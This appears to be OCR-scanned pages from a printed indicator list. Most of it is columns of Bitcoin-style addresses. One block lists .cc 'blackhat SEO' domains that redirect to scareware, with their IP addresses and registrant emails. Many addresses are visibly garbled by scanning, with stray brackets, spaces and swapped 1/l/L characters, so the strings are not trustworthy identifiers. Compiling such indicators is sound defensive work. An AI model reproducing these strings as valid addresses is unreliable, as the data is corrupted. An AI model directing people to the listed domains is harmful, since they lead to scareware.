1TRpyNOUBgNQaNmLfaUUpzNzzfJh3bWrm 
LTWEbrPvvQB938PNBtV4cZqWgs5PowwzL 
LUhNKZ4E1D8VmKsJPaNpAd3CRHQ7aeDYC9 
LVhEsBEVShqi23nJuchjv4RjPGWsebcYE 
1Vyq49mkXAKm26byYkRbWvfuAMOWTKQLY 
1WpXnkAEDCRuHNtmhbCf5qJvTCZ4Emwtb 
1XMglyXchTJggbZ6SUcDJgo6TihNfappV 
1XSqQ6dB9ORXRVpeE55)Utxwt9iIGLJHKUR 
1XXqShnuXQUFrq2aVqw5gD7huztxv15AV 
1XcNRv21j3ZcjENto3ngggMcT6UWNz3gY 
1Y7vsb5fFekwf2ZroacGgf6WXFqfDz3mb 
1YKrVcMxzB4VtSFLUCdHLSMW6DyxT9o0vC 
1Ym1z2JXPZ88MjUsT17ZRfr1TVfdkAagMn 
1Ys3za4NN1q8YzpVPqyAQxa81DwxhNqai 
1YzLz3KFXfe8vgBQWHTXt3mr1lWFXjU7W) 
1ZWA1QKzye45KzjTLRzfrMYCMLN2Q3D4Y 
1ZsSK2M83QcqFulayZJoLrwXcJtyU7iZQv 
1Zzq1TordGW9WjqRtSvjB6cFZ8xVi4Z8v 
ladUvFVft5ip1D5zp8F8NJk9kh79nU6rf 
lbh1BchesKm2kb7yPBMfgy88vumegy9mb 
LbuSkzxSTihsnmXy7kJjnUXm42eaUSxrH 
1cRfd3wD6PAD9XiTjYLFvbminMhU4pAyM 
1diDRBNkhFQpsPqmjSjikMAUq7jkKHqHYh 
1ldoC4F2ajxjBoTAQaYck2UPYVSwck5iLd 
lebw9ACv2G26zeXSNxMTLAYRdhQaYGNTK 
leiJUQrfMFHECrsa4jo79]GbGSHSMP3sL 


25249 


1exxK4HHSA]7UwSCgv6BMQFC6cQ8GtynZ 
1fMHeTxsa4efaWn463abtKN3EATAi2D8t 
1fPSuLTE8Nb5qjbAnr776xKDMxRdnGEnG 
1fPTeoKsFtRPfelLacs6Z5CFmNvd]5jVo 
1fXzCsoxHmR4ukpVy5qz1444gxwT4PRxH 
1fzocc2 YmWY9aegv5KaoH6)]pFJM6tuBR7 
LlgGMvUcSMMmjxxhtVeXNmP4oHraWJuj8G 
1gSvMhoGytQcuLRPtH502N8WMVY3xUP4T 
LhBGyAMPci57kjMRuHtTiiEiyMPPbkNog 
LiFZpJwMimo4mS1j1qMTAg4rkybBoN8Nk 
LiHbsSFWuNb4wQzw8Ldn2jHPWpSdDuAcA 
LidqBEJ yNfEFiyBHwK3ZqS6GwbQcyVtui 
1j6QAx2ipu2dEiIYUHJ 7UAUcWaqtxPuVw67 
LljcvJZRIWUWgkcJH19KdZ3bZM20QDbNsh 
1LkcAlnvVhr5ixtThw8xfoxfwzuRZERRko 
LkrEAK6gEEVTxwkRavzNXJppzsqfbLQjs 
1m5BTrr9W3HKikecuEgJLmM5s63rWFprE2 
LmvkJUN83bAaGHJovsNCyS4e6Pz1dvR6G 
1nF84GBKinPJR5kn1lpfaaTqFEnD1ANtcu 
103zaAc2VrSpcZ6WXMJwd15YcSECob1PR 
1Lo9Bx4sQk5yXXqcrCJ5jur9ELU3WVJV7C 
loekZxbDt511Fc8qB2eiByApR51kUrm9y 
1qGLQZLpYsLtceq2PojF5vZ5o0pd11sp6T 
IrKW7B5XcAHVZg2ak33PM4fsmNbvvVsnG 
1rPs7xmD9eergSxxUpNTXSLV5g6jC1FAF 
LrapkNGpfKB51CyXjGTVFJGG9M4Vxj85q 
1sXDf7UKSS2rKLP91ywL8SpgNSYFBQV9Q 
1LtwA5xpEVLwZP85Bu6xsJhU6XJdiL3p4D 
LuACM5a9eBSMHCpxGKDfGH1t6eVbuYJaR 
LuH55DnatPBnRYzCdz9H1KsJmYwz4VZjh 
LuKGjVGEuphWzu3Q6i2cRiJ4p78xFkxaS 
luhs4ZfVHCvdYEzawxNs3Uy826ZCxJycN 
LusGpUjqewgBmkTJLaMGy47W24Xe206gb 
LlvY26JM2Un4u73m675Z7K35WEo9hTZ3fm 
lvdXB9ZypVbOWPkF5RVUFKq7Mt9xigPMAL 
25250 


lvrZUdKGP4SxUvZixwxTsGZS3N4zVPfac 
lvvtrvNeWGh3jKkw1twzDQrtRXMM8sjGr 
LlwDh1L4dTkZxgcByB5Rp2unXM4ksVcuKC 
LwP8qiHTmVMen9jgL63teh6Tz2L1qDbsz 
LwXhzCjLtLWykwKvigPQxMH2rYahxkGAW 
1xDpRwé6tFCMaRKAsj TeaRwmmVmk4dielf 
LxYMU7ITJcFFxXYQHTTFxsgQhgdfWwWH/7/07 
lyA3czfyuUeYHwgNZnvBSatU8Z7G)Jffj2 
lycPUd2C4WqowP1EjyWnyt9JotkePun6f 
lynpRpeMVkfd483sW3UJVQEh1zhoU89ZA 
lys2btdHQ23dLnKcgYC3ztmAd9rQyed73 
1zKjAGkomyzMarKQFvWVjHWMgFWdzBaUL 
1zZSdP3qVEUSzqr9yQwgpTJ6nBF1lqsUfLQ 
1zfoqGvUaJQp7Dg5mP2vcC1m5GzVydUAq 
1zgk5vlLhvaSfzP47dxseHhnZ5N1SmpJDu 
35iCvpMMnUWcSWrYtLJLXqe9x05CYEWRhw 
377CY1M8W2qbQQX5HHijziimdh2faGjDeLv 
111K8kZAEnJg245r2cM6y9zgJGHZt]Py6 
1123pJv8jzeFQaCV4w644pzQJzVWay2zcA 
112536im7hy6wtKbpH1qYDWtTyMRAcA2p7 
1126eDRw2waqSkWosjTCre8cjjQW8sSeWH7 
1129TSjKtx65E35GiUo4AYVeyo48twbrGXx 
112AmFATxzhuSpvtzlhfpa3Zrw3BG276pc 
112E91jxS2qrQY1z78LPWUWrLVFGqbYPQ1 
112eFykaD53KEkKeYW9KW8eWebZYSbt2f5 
112FTIRdJjMrNgEtd4fvdog3TC33Ah5Dep 
112GocBgFSnaote6krx828qaockFraD8mp 
112gXL4AeJ62DX3htuLhBc3MtY5U6X5J28 
112nEBUadWiMxZUUASNZpQ9AvePtrJVuca 
112Ns49U0bQn1cX1GlaxslcmGvjFBxVxvf 
112vq2Wt7Mo8RD5jCKMR2PFNxAoT17ffxD 
112wjYgWapZU8gTPR7hLoKq8iEh496vKxP 
1131P1hjj 7AYNinHRCKNWGFifkK4gGoe5EF 
1132fapAqQVQJjZipWzJPKYxF4LNSDEvuc 
1136MFiqBmoVWpqWrlokF3D5XMabwVLB5z 
25251 


11382a48qWatCiSqVNBFZUKN91M7Dcdev 
113aZAjq9fkTY3qeBE4C3o0jrxXyQFKg5Nnd 
113bivxFjurkAoWEfVeJ4jawk9fQtn3yRF 
113DQh713pR9rsEWT gae9DGfVzY5f17Sbj 
113ESVqntvYprqQbsPN6tEmtE1bB44uo0kS 
113jYnToJJmGiLyQZMpyCZTYSb5GXFZ4tN 
113M2D2P1Riyke3CHaBBF14F7AB7pQ8Dz3 
113nP4t4ayne9A5MkZEa72GEBgkqLXZGkE 
113NT2GAbQRzT5qLfo90vmxVuPwDbchoiV 
113QcTeGajE3YMKU1JD7QMRgkuKFFSHkiG 
113U6pALuJkKFE3mMTmMWZzBfYkK5AUjDDfvxXC 
113uUHEU50FygrXY6GR43DrJmy4tFQ1Gcdr 
113xQVVssnSTggjXtntNy4RvZ1rs46ehub 
113y9h8ch6wASL3DE4WDysDVxXa4LsNkH3 
1143t96LASL6q6UMAJKQKd5BLkeV6Q19ys 
11445 ybEvoBuFCnaYGni4KQDgKRZ3huiJX 
1147GrWQh7yW91kV65QP8BhFiIGQQKuW3n5 
L14BqWjEYT XuVzFAEc4qdz72j3muFPMSfH 
114DARzZ595UwHRrWjR2mufuUCBifgHTHEw 
114eDjVXXAQKVEnnjLTrCmTDzh7WSsTGz1 
114ey7aLiid4RDdCYEp3GjAtWX30Rz7eq} 
114gGmini5G9HEwEkWtkKXoQqT1D6S5AJvU 
114LhnRZAbZPhiMmdBwqQ6QMYjxYFX8Qxb 
114ngXYgYz3gLAaumxKUZM42KR4HzsDdjn 
1140cYENUbxs7EsJLCiIDMeGzYtVzjAZbeZ 
1140mc8xdDgEfraC3Q7bEbujc6BRy9VsvVJ 
114pDLxwCMHCrWSWinhy6ij7aZFaAssEFs 
114pv9hdWsQqj8eNNm2a4rJ2eiCSatxXJmg 
114SCq4wvHgH4NZ2DdaxXyqBAtBSxpVB8Wo 
114sRec7rRdyacs5RVY41WVjLmgiFMVVRm 
114T9gEoJ7G9LGoAL9wWDT1nBGGQm3hiS]y 
114TqRY9x6byYf5HZcBdoDfHUZX68tdgTG 
11537czwp6pSjA8MtTUWmxdxhtVfrPefCx 
1154LSM4xWaAY8shZj7jdmP4coWKD16S5f 
1156mMWEn]8gK9kn2UdpPUcavyqC39mZxPw 
25252 


Blackhat SEO domains redirecting to scareware, currently in circulation using a .cc tld exten- 
sion: 


agjjgtfyi .cc - Email: susan@michiganfarms.com 

ckckoo .cc - Email: briettamacpherson@gmail.com 

eunlabkce .cc - 93.170.134.175 - Email: susan@michiganfarms.com 
ewjwjiavg .cc - 74.206.242.22 - Email: susan@michiganfarms.com 
fgodvsli .cc - 93.170.133.205 - Email: susan@michiganfarms.com 
fgodvsli .cc - 93.170.133.205 - Email: susan@michiganfarms.com 
fyecdizt .cc 93.170.156.119 - Email: susan@michiganfarms.com 
hgzondsul .cc - 174.137.171.69 - Email: susan@michiganfarms.com 
iiuuoo .cc - Email: briettamacpherson@gmail.com 

ijnteqc .cc - 93.170.130.105 - Email: susan@michiganfarms.com 
irolopl .cc - 93.170.134.203 - Email: susan@michiganfarms.com 
jglcbngvu .cc - 93.170.130.217 - Email: susan@michiganfarms.com 
jpydmee .cc - 93.170.133.247 - Email: susan@michiganfarms.com 
kdwwwwon .cc - 93.170.134.231 - Email: susan@michiganfarms.com 
kgowncgi .cc - 93.170.154.179 - Email: susan@michiganfarms.com 
Imhhsnd .cc - 93.170.156.105 - Email: susan@michiganfarms.com 


2528 


115fa27QgAruE6q9k8SNAc4fadsNoAUINv 
115ia9StrwWqT6xJ9Sd92hm6rA4EBPsE3W 
115j3623Lx42gyC1h9EygmcqH6mé6bgDiky 
115N2mMKEoCBYMT3J64iwXmZ95UPjU8QMZX 
115nw4hbAbwBSUfVhfF6EWvf4AcAcmD6p4 
115qagP17Sd6EPapsysznekf6i4Kkax1gR 
115vefbFY2PCL4cYAoCcCB4TcjUGnrgLKw 
11697Zq8pAWXEXAbh2zvPTfVt6Vn 7 DAMzw 
1169bxadw4JaEe34sNhcDz38AugtLGp965 
116AZEfaPi8tbczYYcSdgG4ktEYAitbCfD 
116CD6FiyD8)JTJ6iLRWJP1BubaJthVEYFV 
116CZ3t7REDPhGLjBdk7U84nWLAjpaAqay 
11Dvz6Wh7RcmU6ffqdhQLoe6xvQmvwkKAC 
11jLeJp6eGET8H3)JPDWFBtka3jpYbBHC7 
11imf37Gyg1Ju6NS7uF8BoynVvfUigriNh7 
11MvtJdLMh55y3RnS7iPaCra7JS6vZSEF 
11PPZk89SHxXR3p42mrSof5P935vqjEA2C 
1L1QtMGVRQhHt4E4wZDRhxLZbdHgANJzhFXx 
11r5p8FPmLu9zw1XjufDcydG3rjQ6tzJc 
11UC4DMzTR1qQnNEHs9XpotWYAmzs6nBM 
11Us7kVfJS2dzryGJkSaAG4MUBvyvbZHA 
11UUivRcVdRJWymipDPB6WzbxzWmL7a3B 
11WrKpCb9YgyPaV7sPPbX5EcPQf2q8d9Z 
1216LTtQB2hhpU431yYifMcmnAmsh6vjz2 
121lakKu4wARyCjEMrpWb9VfSnF9DWbjjVgn 
121D2DAFrRGLHoeZDaATIrjEYj69EknvsT 
121f43NCvucZnDWWcUFg5geNZE3ZGMeN6f 
121G2n8yvEaVy6Gv2CQqs7RN2f4PvfVBtk 
121gqN1Spy5BAr9q2NB9K8L1beqzh]yWKG 
121JhGRZGL57JgqxtdsxkUB2kF5Xyz7nPh 
121MuhNTovhbS2bfNk7cmtXQDwkXG93ExX 
1210ZdRWsZ4LKhdwSgzLbK1S7yE7FnMw1x 
121P5TiHimHace3ZNuxXU4hde9kWqPE1jHC 
121QX41wBNYsmSFEGQ4qnRpNPSai3sUSMZ 
121RWQ6sk36FHcVTbW637ES19rmaZa7jQ7 


25253 


121XywrM8cRm2wcccPU7AbGxAAudHukiQL 
121ZJYMgAb5eEheFEz30eoBwbjrLpobG2g 
1223GLPpMTKXxyGg3WcHpRsPD4JGa7cXVk 
1224txnU673nCa5Wxa9JHkpGmreTMfknsA 
122Q8v7EkdLGfho7KuFK5u99mhyp1nkiFm 
122w6H5sV2h9dyAwk4rcedF4piGnzmbFFN 
122xQbcFm6jfrtwfGHdxCdGrmwvUuNxIJft 
1231w7pJYCa9W9qBSJYNBp6QrTaCSV6YuD 
1233d91rHpBN8spV]qv42syB72)zflgGJb 
1234KPsuDZ6n6htPvxYRyzc4ND9iyBGhkY 
1238Mzucsxe7SiIDQSssCLQYppFHHqF3zpi 
123anBkpeHW3dgxCwUxP3zxVRLN8Z2W1ZqZ 
123bzPBEJK2N9aoTAU7TRqQLbwzmFWq89S7 
123dhAgbloMyFHrmxx3YgKdDWTRn6dWBFm 
123fvLmMUcqnFxK3pjrdDePE5ROW9N5VdnS 
123JmhW8mtaRTJJBHFFNxkuyDyyYmozjTd 
123019yFFV4MNwjaaKku1d97Cu5Cxfi9SYT 
123r3eATfVPEHABZTMbB7rmmX5UYTTKdz} 
123Sdp8rB7C8xJR3u5VX6J3BiyQArtLt7Y 
123timpjDfFSXHB1kL2dJYTW3YiPAtfh4AF 
123VWsgKcx1cjn5KBepCV26hF Xu7TcWfSY 
123zTvjw931gKezg4bMwaBS45YBQjJh3pZ 
1242DfZdkjCedkJhwALyfyCftWibn7sxhd 
1245pqeT15C3n48dUJqwxtLj3jtBXFX9z2 
1246i2CihbSXcLMM67sQgS7xed]FPsuaa2 
1246tUptR5e67CG7MAfPtjVpSdM1dCUH2V 
1246v8SAeajt6k3QFVzp4My8U13PLZTyV4 
124ap6uHgT5MeB1L5FPUENhQ2DdG4boyy3 
124BcwPQtUGAFzuh3mLi1lVxGD6Yy2sfb3S 
124bNuUqL2WHwhgq6fBMv7s4ydvL8q57AdN 
124CHLbPZ61W9n3T6alcCWT9YX298ij TdU7 
124cUCq1tkYhFf39NAnN6dYRwkLrvBNLAx 
124EhTSKcd4M1RNisFp7hpkmEj6UEqLq1H 
124jbjnjjy8t42BDmaBd8kx6fJc2CTfdeE 
124mKpjUJzXQ4PBZF 3bnGKdYmDYhZaZKb6 
25254 


124mtgNTJmEQqCpqBlyFh6go8MTrFnUcx2 
124014rxNyvFMQM8yJuJFcKprxPtVHq8H5 
124pf8wT 7SGfKENQ204wYEgJC3tA3U5b5W 
124RvAEuuCptkzZEEttPxXvH6tSnXxJ3XN5 
124XtfRqTrw1HP1g15z15cVXB38T3EwWUZR 
1251GTBafwFoEKc9XfffnaGAhyM1V1o0p3G 
12524A8PP7PFcDXa9BpGHghPuVcciCvCn8 
12538pAHVNXTgpZqlvFJ3xmdilmk9Z4sjJo 
125AdRL3iYR4dDnoyUAv7nqNMYsC7sZcYz 
125AoxRRMZz5GpASK5sCChATKfNvbSzBF5 
125Bt91xWLH9AfB1UB3e14Ew17A9Y3id1X 
125CumpADmsyhByPszDem7Bda7XhZ8Sc7q 
125DU467DRf6JBvS2Q49jsYdY4ZvVGBbUc 
125FCpENaKRu95psPP8gETM9u2EmvfAhF2 
125LPRJuPss9H6ZiaY8NBngn4VskfS5fxo 
125MojD5wAy6YdZMwgWGPhv3WuhzDEgMue 
125nzBhomPsMxSt4KwJZZBwE2ZEaDPi3ip 
125vS1drhzddwkCAZfrMUjxMBU8xJ7Be9v 
125W1nXxDQ2Cer1lZqaQcqHRp8TP8Jcw58y 
125xYjgLM5wSHWjwQ8NTKXE2uGpxuhq2Ex 
125YGMHAvJ9EQZhwJTaENhQcaeuqgbHK8} 
125YW2ptUaSzt6p3R7bvBCivbVJcLEeJQH 
125ZUWMi6srexLUPfRMMFq63S8mmYcMdbn 
1263vfRQB4z86JdLQZA7DEmRgxNsvRNuzm 
126B8y47a5SHP8vkqDRCvT2nQFvTH5jmbx 
126nWEHOMe4mmMG43xNYnfPigUuYmj73yq3 
1260NycBsQTyAunbn53nUS5qlwm6BSG85Y 
126QgMcdZormJkKN9uUkKFCtBLrftzTCy 7UdE 
126RpC8p5p4fA6rADzjuAfyobs9HZDWXxU 
126vLAn72aeMpV3cNinf7QYDynA63Fhcfq 
126x8kik2WChKXAXQEGZR4akjsWESTWZow 
1273apuhjaj55g60Y2xMENVKGMU84b21Ms 
127g7s8yzdH]x75f2Hnb84CRgLR6ykjJBAx 
127gTQMvKxn5r6EhmigwxXy27R1rBGtjJ2Vq 
127M2VSZFNghk8sZs33vDcTZT5cxndengS 


25255 


127MgKCjtPfBpcjJXQpjmthMmeMsHwC1BQ 
127q4CjuZaYfErFBaaxEg7abgjmi74s25P 
127rxGGYgfnUpBdzY421qZ22Hx1NkBfFo} 
127t2fhKMRexrWAstzKRtovQ91n48EufDz 
127TntHYgrASVmoRNnbriKRBGyMdjA7nxP 
127XPY45fEyefFqpVrgsHiQ9XUxEa8gelC 
127y4JUM7GDWSRB8FnF6SFKPEYBcwiNC48 
127ZmcfEJQPN3VF7YiIRXznRUSP9XFLRT vx 
1281lohRUGRXxCiIBZVWHEawxUcKGUJKMgMT 
1285KWDgm6EyXESc7LkzoW47Nk89bBLcJU 
1287VVXELJUJJYAt9TNCAqWqb31MDgzxA 
128ApausYAG5hCiRjzY5sKnaLAU7YSavC3 
128hQiX8Q6rRCSd2feVY9iXypcfm MarF kj 
128hSNARVMTQ2tMXCcamBwyMaJg8whFD93 
128KyTpc8uFJjH3TkKQqWwjHf4EtqLBaj1kf 
128MhTY5HV28q8FIUYXTW9ucl1sLTXNf6Yv 
128mpaTzac6LueCW]bFABubxho8bppMCCh 
128nMHjJi2jjuJqDpf22996fp3ct5saE4SK 
128pJdREZcCR6xoryYPQAPzZGf8RWMQjRBzDt 
128w8SoKxFDSpYsikHEqt976rWpurugsnj 
128z5Ryj|MWjk6J8Kmd2PtHLBTaX 7PLxMXP 
1292YpCkitR1YJajQGuhW6TmnFngiMcvjB 
1296LGVWnx9ch8VJKeczDQSJfgEVWUtTjz 
129Akrx2HmrGuY12VQxD87yDz7iDgMD7W1 
129D8c3KdxSJZ1fjDb1FUNPNotnGx9W3gm 
129fiku8409afUR5WxqvB6p6zpeDQTLse8 
129mczcETtPz6cd7tQbw/77rtbCKyMyzmy3 
129nsZZr79dNfr9fKSGqeAgTBBgCVvMyKU 
129qSWnnjJgaKkjqgphitXZJM4us7DghuKEQ 
129qvtbhBYWT1PQsafNF5iW1BamNrh3w2f 
129S25UKZ8UmCL5fteQUVek662wQcdgwyY] 
129U88iERn5dpjm2gdeaJBQWA87zeiULY2 
129Uf7pFWsGwFwBfNpPiygzgu5qwystZi3 
129UJgwpPveL6GUHEdHnKNmGACkKuMDZfpx 
129VKWjZX3MErCYXCaYjGgDwcpMAfS9nQq 
25256 


129VXFYAjmgijAc2bL9MAPyr25FqMYLymQ 
12a3en7qN42o0bGVqpi7VnWYk6uP3gBrKBR 
12A40dhhWPUg6kSJ2iMQeFU8pyjUHqQESx 
12aA920MsD31uzninhyoejGsd424Xasf9}j 
12Abargx76cyUe7CCRivu39HyAzLtFRpFh 
12adaAHjcGiHo2yrAtbNtvTNjFuWaJszU4 
12aDqouMF2C2UVqGnZPW8NnSFTKDjFhoRV 
12AG1UgkMsrt5gzdAtadtQfEpjqQV5AQyM 
12aG56SE7MiPEZNZGsrGj 7UBWWHhRhofrj 
12aHn2Lrfstsbz1xn61lv24sxwjnFn6Vb9p 
12aJv7J7Y lcHekzXeAEfu8cbtQFekt7Mk8 
12AJVQxNWE5KXgGuCDfwx28HzEw5Zg8rUU 
12aK83HBUgMLTTTgApjm3WSXC8Nysbulzs 
12AKEJ5xoNvQxXfVCLVgcseFjxbaYpYoFYP 
12aL61BCyNRekqFBtS51VDFR6MdksUntKv 
12aLDQd5wSyFSw5UAUn7oveAzKFp9DP48h 
12an1MU2ZoTtUkgA6tEaHd9sUBmLPfnhj2 
12ApuCRHTgmWYkgDGS5iWZNjpMphYcrnJuS 
12aqox52qLSjBmUPqrSVNCq8xfLLFhogCY 
12ARBcVv7DLkai8WWL4dYJzeHy78tC39ee 
12ARYhZskrgygtzVNVOo9MHvxXSQGcgS3dLH 
12auPXP2TVF19HTCDS6CtXfYAFLKGuotEN 
12awBJaA3hrTJ2XH2HUexWSzxd4TALK3sn 
12AwhJYuMpx5 1iIWNCA9g3gKbDGswvF4vhK 
12ayDveFNnZ4rkHHs9VL5VROF7VkXsLSDp 
12aYrgSNW38bbYQ110JiCi97g945f2rUgE 
12b1GRhwt16KkDVesdPHFx2EPbpjrGLEBQ 
12b2cm2Ae6qqcHknAommf9Nfrv49ddeLzU 
12B2niYoknHSR3PCrbU7cThr]Pak3hnDu6 
12B3hpaiiut347TnylLCAtaCWD9Lk2umG8y 
12b3pCCdEpygZkKxmFaBJrKzZZY8jDXXGJD 
12b4GsjoHDB83EYPh6xrHqxJ8UrzHVZSBH 
12b4sLcHtX687t6xfygeWySPEXnZYgGhUc 
12b8UJclJwX7EBLN85rWy5sJZ6KEWEXg/Yf 
12B9366viytWivDFv2RSBt5rh6X8J2xRcs 


25257 


12BBafApDponRH9K3RDtaZDxLLGFYwFXZt 
12BcvQc32Nyqxc9sYWq2joLdHZpVcebThk 
12BCVTUtBhDJ6BEToBkUJjS6pcC8iC7kih 
12bFgXo0CC7Xrqq72B7McYQTgAGBwjzUBRp 
12bFQKWGP44R4et48bABuGC5Q9u9QqtRcG 
12BfsGS7Jt33McacenxGkvaLnEGbTumo4y 
12bFt7MX9U5yiMXAluftqZcamWVPAdL4Pj 
12bh99VY4p4nmtCv5d7A6eXbznhauPjYut 
12BkgcSeEbb4duJQgvbQxAT2y6VTb9Ajob 
12bn3LoWmNe9xaqYrphf3VT6B4gd4aJZ74F 
12bQ3XUrzSB2UMcTmnGm9c8exvAg2idQnZ 
12bQFW5C1JcB2QxW1WWR2t6msCX1Lvp5FR 
12brzG9x4FgodjJySVK9AYWZptKzbiaLNvg 
12BTGiU8k3DebBpt8FeLChcuYn1dAxZtLQ 
12BthDijFiBPocoTWqVohWdjKncCda44cT 
12BTLjaCN8W3m48zZT9KN375Udx6pZRq1A6 
12BuF5unjBPDbaxfCJjylirw5GW 7vQzZLtL 
12BuHEuvsxaKkKsnVxUqi9p5HRiraQPzzEdXx 
12BVSTVQZQwwvAYgDMoT3iQ5QgJAJymEPM 
12bwGmoaJ3sMhK8t6m3MZr4syRBSUpzYZV 
12bxdN1EL5qQFkb1cVbhGYCcJRtnGeZskK1 
12CleynmuGj1LSmjhohDKTmfp7kmhofd8c 
12c1xo8VVx54k9vxrHt9D3Rdg64cqpzRpc 
12C2AVZtF3t)8PS4KrgywPAY9AvxyrXKdN 
12c2GMSEYJF8Uayf3c6pL18yN7sMKE5Vu2 
12c2HedBxkNcGDmrULVdWwUG8b7QAjYShD 
12c3fnMcdZA4GXvcn5SD49WUAdqtDpordjY 
12c77V7e7fIcbtzDtyoGPyUWnDYSn3LLEr 
12c8zhDRqtHQiEBleBhr4UZ2dX7SVHZx1Y 
12CC9QvFHONYWFYYS3maCfMEedjcFztCbf 
12CCkGKGz4jDdFcDqzotoy9J9BtYUGkoHw 
12cdeLkVndEN6ivBXuZgzbKirok}Juyorj 
12CdhViUKBjUZKr26VgXKGUyMrEw8UJefN 
12CEeuophG7FNmuqoEwy5yJs84NFiwotPa 
12cEwQErB1WhFZNwEdel1DoJ8H7na3iVv26 
25258 


12cgUZebTRDANQChFZSKh5A94 Tafjno4kKG 
12ChXWV3HSLgFzBp8nWs TwngyrQKa3LbuY 
12ckULZhBir7xrFozwcUrdw67NDiFw2711 
12CKzfYkaRFjJvmfUEJmQnvPntsniuRWoj 
12CmpdMMLdSNBMUNPDoav3 LyEnSJPZ8eBv 
12coWPcyjP3zDrSRq5WtPo253fjriqhSRo 
12cRDsggZONMFPcAQZpEDNZ4hAUXktziE2 
12CSGaBgV2wLCfrHaUYb9c1lqquaKZhWVLn 
12csHFpn2YKUYDUxGGj4gGd9zQ1ppebeba 
12cSzpB2kFPipFc9MMxvZKnRXpr9ONtx4dK 
12cTgCH3xbXVSMNcPLjeBLdaYql1939m9Pc 
12CVBtjoFHiDFCjchZcRX5PlejLhFLjvfr 
12CVqjuLfa8bxE8GazRvBdTF2eJJ9tqPj4 
12CxqYzqvkuPL4V6DepUEQ2v4rzfxWaShp 
12CZBG5UoijWboX2ypoVmyTEXV9AIkt2VT 
12cZEAGKTCnHmvgKP4GK1jXq36WrUkDiMh 
12Czkbx8EyxXvw3n8uzqBsdDVWH2HGYmPQ 
12d2U9ExXczuLhX7CQhqRq7Qi2wCXEo7ut 
12D567vQ9er2GruAd8VvdmyZXQB5Cnu9Wo 
12D8mvTQSUUVrUIWtnfuL4FQqweZMTwqH 
12DBozrhrTfXwP5KcfKs89ST5pcxqblisv1 
12DcPs8ebvSUnAHk8HeXLPcSAATvYhvV2A 
12ddHq2wQ5qGuB5jfQQGCEzrDRThdMsgkE 
12deDuB8d8B5ZwrhhGMugSuv7MrwbeZ81m 
12DEjo29FXTIGbP4EwpvjSYi2LWzfsH2AV 
12dfcxp6v8LeLKN6Mp9WrrrhfiabXpnyYtQ 
12dkwvP9iIHUZOGPKpNSLVVWVqM1cK1KWrF 
12dL5MUXn7HUjzam9r3Az3Dta9k5gPAa3W 
12dLjFXwgajFao92TwpzysdiTueuZE5JYu 
12DMUt2cpvANGakAvuRNBshohfiVuKFPcp 
12DnbVhk4LGoWg6ciJkdax29UcxzVdBbYX 
12DQ3H5M8TzXjAY4QyoLqQyi3gp54aGme3 
12dTv7rwyo5NzXRPriFS5m5seNv43CzWvy 
12du3RMYzEiptmNDkccfHFk4MXKsrqMhHt 
12dv5H6z4aqPTGENZ6MHtoBU21Pxcq7hRs 


25259 


12dvJyX6pzPxNvTi9u11RpDARHXsCjuy75 
12dvRcvtUiYZmFbzVeZgJuB480h5Zkm3SB 
12dxStdBWTdiRpCYDu6vbUygemxiJLhqmf 
12dXyAjMSfoPesbqfKHWMnHXTVyhPBLoEY 
12E1X1NN6td5rMGxbi8Qu95V85HMVjdnCu 
12e3heEZFWNNhQpctoQmEwvs7DTBrNCbuv 
12e5Lb5i3m3vEwmJMNegyHSv1FeEusyYjUA 
12e6VGvaHgip6GZWxknu8siWthrQujBRDQQ 
12eAUN4MkKXxXkcfq8bfUQztzqSePP1ndkvo4 
12EbcaUq7pbbrHReE5LU9EF75HAFjFCRa} 
12ebZCSFvPvkfaHo5E3rQgkQMBvniccPK2 
12EcxFEe9wV1k5adwHF3PqC446hpEe2AUM 
12eCye4d6JFZHLVWifHAP3bLBnnCRvodEB 
12EDGVJWndAu7LT gxHtJHZy73rJAzccvmu 
12EDPfSwb8B9j8tVrnX79tgolTfYp6gwy5 
12EEdNrva2FgqMHv33Maj8mNXXgWRy17Lq 
12eHamKfJMcdGFTVkFyr6bvyzZivmcmFPg 
12ehFuiASXu3iCM9x7Awbun4YohT9ehhma 
12ehJGw3iyPVN35W47Sxuy5Rfju7cpCMZa 
12eiwSvJX24toU2WW7PLt2AFhtQGUEnN1G8 
12eJfeiZE88imfQ5VojT94ZNH4Fwdtyvz1 
12eLDXkpgh8ZC13m18dAFBREXSn4VzaluP 
12EM8GUzAaPAMu7BhyUCGxSb5uWjqcr4z8 
12EnJqtQ82Rgef5hM17evqNCTjDJG4ZSeU 
12EPHagaxXP7AupvMJrCRavYgbQUyEEbNv 
12ePRqvoRkY5biVFPyp6beExAaWiaZWYhm 
12eRN283yYKXxMpY1Z9aBu7X1JEU3d0ZsG 
12ethpTG9bxc60Qc4hvmaxm4JCUTO60LxC 
12EuJyB9GmsdLZHaP369GuzMPDBEnfik3r 
12eUR5SrHWreuWoszK3eSW3sMTvkRMcM35 
12evJ5yXVexAdiaBCSo3mrt9Pt5C5dYnya 
12exGxjehGRW2DLfSdWcdalUTzsCz4CTYD 
12eYXq594 TIcqenzkGkZGv8YBxZ8xvVxVr2 
12ezbzfMUrmZQHtjPQVimevnB2N7vVUiI7A 
12EZoerqwCFmzWMdUnwpizq3xSt6KxXoqAc 
25260 


12EZv5HnhuPMDcdruoNF xuwXYoABfppQik 
12FbCsiqYZEMY1EPgRwbpTgqFhvjL9OrxmM4 
12FdRqJ46XQDPpQbQPjk2PLLV1GGzPecyU 
12fdWY163qacdZZ46atEPbjfkxKWo3]siM 
12FDXrckyxacGZRQ8uwpVWH39drajua9aS 
12FeS5SoyiZ389E28xjFljymdCyscQ6UFS 
12FFCCn7uYL7DqHkA2hnu9JKabn1k5JVhw 
12FgnUoxUrNArYN5L4Ryh6EAcrGNYsUbiD 
12fgt]jnW3rEpQMmWh1mwLkKXLPBbDix]yhr 
12Fir7HBqaffoLKuuVstr6BFGtp 7kKWGCQV 
12fjZvrBz8AVY24BUUMA5pnTJvELDQC9DD 
12FKqBzMcvMfNQogfjzz]VahZpJ8KB74y7c 
12FLe2WbmCDTicGbpXob6HqRTS7n8BhNF1 
12fMYY yiPGQheUNvod1HDwGbRorkKcGspn] 
12fMZekPXsnpbzUU6CsVgwMZq9vcE9tT8Q 
12Fn9xonGaPe5eYbSneH 2AccidhVQQwRrg 
12fnhoMHMLVANEYMmbNY6CnjLdPRRZFAF5i 
L2FNiP2fCjhik9aVZCuU3RUghoa41khogeY 
12FnQgEWdqkKcRRM3TzZW31SagyDBR7/76xf 
12FQZBebt7nQgA7VubbGHQZKbUTjk9Avny 
12FRdR6hJHT4pCkySmMhUdgv92K5k4Zn6U 
12FSC20DdX3NbVd7ykBmjJzecZJ11lupATgw 
12Fu5yYkojQGV791ttX27CgLjxxhq4RyBo 
